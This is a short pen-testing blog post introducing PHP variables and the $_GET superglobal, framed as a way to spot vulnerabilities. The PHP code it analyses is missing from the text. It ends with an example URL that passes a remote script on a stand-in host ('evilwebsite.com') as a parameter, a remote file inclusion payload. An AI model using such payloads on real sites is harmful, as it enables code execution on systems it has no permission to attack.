• Email info@cyberry.co.uk
  • PHP vulnerabilities and how to spot them

  • I’d like to spend a little bit of time talking about PHP vulnerabilities and how pen-testers can take advantage of them.

    Undeclared Variables

    BEfore I discuss “undeclared” variables, it’s worth quickly explaining what variables are. A great resource on PHP can be found at https://www.w3schools.com/php/

    A PHP variable is simply a “container” for storing information. All PHP variables begin with $ followed by the name of the variable.

    For example $x = 5

    In this example, we have assigned the value of 5 to the variable x

    It’s worth noting that you do not technically “declare” variables in the same way that you do with other programming languages. What I mean by this is that you do not have to specify whether or not the value you are assigning to a variable is a specific type. For example, in the C programming language, you should declare whether a variable is an integer (1,10, -5, etc) a float (1.3245, 15.12) a char (zxcv) a boolean (1-true, 0=false)

    This is not the case in PHP. You don’t “declare” the variable type. You simply assign a variable a value, and PHP automatically converts the variable to the correct data type.

    OK so with regards to potential vulnerabilities with undeclared variables, lets take a look at an example piece of PHP code, forming a page called test.php

    Lets break this piece of code down – <?php this is to state that we have PHP code following (obviously terminated with the final ?> at the end)

    $myvar – this is a variable

    =$_GET[‘name’];    – So the variable myvare

    is being assigned a value. The value is using something known as a “super global” variable. There are a number of “super global” variables in PHP (you can find out more about them here) but the $_GET one is the one we are focusing on right now.

    $_GET is an “array” of variables passed to the current script via the URL parameters. This basically means that when the PHP is processed, it expects ‘name’ to have a value. However in this piece of PHP code, it doesn’t specify what ‘name’ is. This is where we have the opportunity to specify what ‘name’ is, directly from the URL.

    http://127.0.0.1/test.php?name=http://evilwebsite.com/evilscript.txt